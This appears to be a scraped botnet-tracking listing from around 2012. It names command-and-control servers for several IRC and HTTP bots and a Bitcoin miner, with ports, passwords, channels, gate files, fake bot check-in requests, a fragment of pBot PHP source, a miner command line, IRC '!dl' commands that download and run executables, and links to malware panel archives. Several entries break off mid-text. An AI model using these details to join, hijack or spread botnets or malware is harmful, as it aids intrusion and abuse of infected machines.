Urls are: r00kiehttp.no-ip.info rabbit801.no-ip.org drhawks.no-ip.org pooostealer.no-ip.org To see what command is currently being sent, just add this to the end of the domain: /bot.php?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7 The command will show up in plain text on the page. Hosting infos: http://whois.domaintools.com/37.0.123.113 One other on different hosting: watchshopper.no-ip.org/backup/ Hosting infos: http://whois.domaintools.com/91.217.178.192
58.225.75.155(100 linux bots hosted in Korea, Republic Of Seoul Hanaro Telecom Inc.)
i m pasting the whole script u have server and port inside <?php set_time_limit( 0 ); error_reporting( 0 ); ignore_user_abort(true); echo "Success!"; class pBot { var $using_encode = false; var $config = array( 'server' => '58.225.75.155', //server here (base64) 'port' => 9999, 'chan' => 'machine', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"Read more...
dns.domain-crawlers.com(Bitcoin Miner hosted in Germany Hannover Fastcom Ip Net)
Resolved : [dns.domain-crawlers.com] To [212.48.121.103] bitcoin-miner.exe -a 60 -l no -o hxxp://dns.domain-crawlers.com:8332/ -u haqidodges@gmail.com -p password the guy using this shit is a real hecker he uses gmail lol sample bitcoin-miner hosting infos: http://whois.domaintools.com/212.48.121.103
aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)
Resolved aminakoyim.co.cc to 46.246.93.77 Server: aminakoyim.co.cc Port: 6667 Password: timu Channel: #NGR * Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe * Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012 All users are auto joined to #debug# on connect * Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1 *Read more...
cdn.barracudasec.com (Barracuda http bot hosted by Seychelles Victoria Business Dialogue Ltd)
Resolved cdn.barracudasec.com to 91.217.178.192 Server: cdn.barracudasec.com Gate file: /bot.php http://cdn.barracudasec.com/images/logo.png Bot Get requests look like this: /bot.php?ip=0.0.0.0&os=Microsoft Windows xp&name=FBI-PC&id=Federal agent-barracuda version Bots will get ip from checkip.dyndns.com or api.wipmania.com Hint: $ip= $REMOTE_ADDR Hosting infos: http://whois.domaintools.com/91.217.178.192 Another panel is located at xn--y0h.co.cc. This one is on a different host. http://xn--y0h.co.cc/images/logo.png Hosting infos: http://whois.domaintools.com/37.0.124.66
diablothreecracked.in (Smokeloader hosted by Luxembourg Luxembourg Root Sa)
Resolved diablothreecracked.in to 94.242.199.145 Zain got himself a new smokeloader. Server: diablothreecracked.in Gate file: /index.php He left the zip containing the panel and original exe up on the host: hxxp://diablothreecracked.in/smoke.zip Here it is if he notices and takes it down hxxp://diablothreecracked.in/install.php is still up as well. Hosting infos: http://whois.domaintools.com/94.242.199.145
zqpoetyafw.org (Chebri bot hosted by Canada Affilnet Corporation)
Resolved zqpoetyafw.org to 108.63.14.21 Server: zqpoetyafw.org Port: 20001 Note: Not an irc. Don’t waste your time trying to connect. This is one of snk’s bots. It’s being loaded from his irc. * Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html * Topic for #load set by lol at Mon Nov 05Read more...
5.231.22.188(Athena bot hosted in Germany Bad Homburg Vor Der Hohe Ghostnet Network Used For Vps Hosting Services)
Sample comes from djmetral thnx to him Server: 5.231.22.188:6667 Nickname: [A|W_XP|2]cznug Username: 18129 Channel: (Password: ) executable is binded with other bot in same server Nick: hAtbLaDe”; Username: 27867 Channel: #Support”; Channel: #Lobby,#IRCd”; Channel: #l34k Channel: #IRCd,#Support,#main with Password letmein,somepass,anotherpass”; Private Message to User VHOST”;: “VHOST”;” #army is the channel for ddos bots(pBots) here theRead more...
rtu.jgieo445.in(irc bot hosted in United States London Santrex Internet Services Ltd.)
server rtu.jgieo445.in PASS 0 port 4707 channel:#botnet (thnx to anonymous guy for finding the channel) NICK [A|W_XP|x32|D]tilcbb USER 23637 8 * :23637 Local users: Current Local Users: 53 Max: 517 Global users: Current Global Users: 53 Max: 517 i dont have the exe to find channels feel free to discover them hosting infos:Read more...
mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)
Resolved mirror.serverhalflife.com to 95.211.209.178 Pandora ddos bot Server: mirror.serverhalflife.com Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m Other crap on the server Microworm panel: mirror.serverhalflife.com/micro/ The password is “root” Files are located at hxxp://mirror.serverhalflife.com/files/ blackdra.exe is blackshades Connects to own3d-private.no-ip.org:4010 Blackshades downloads more of the files x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn FBI access panel (Welcome AgentRead more...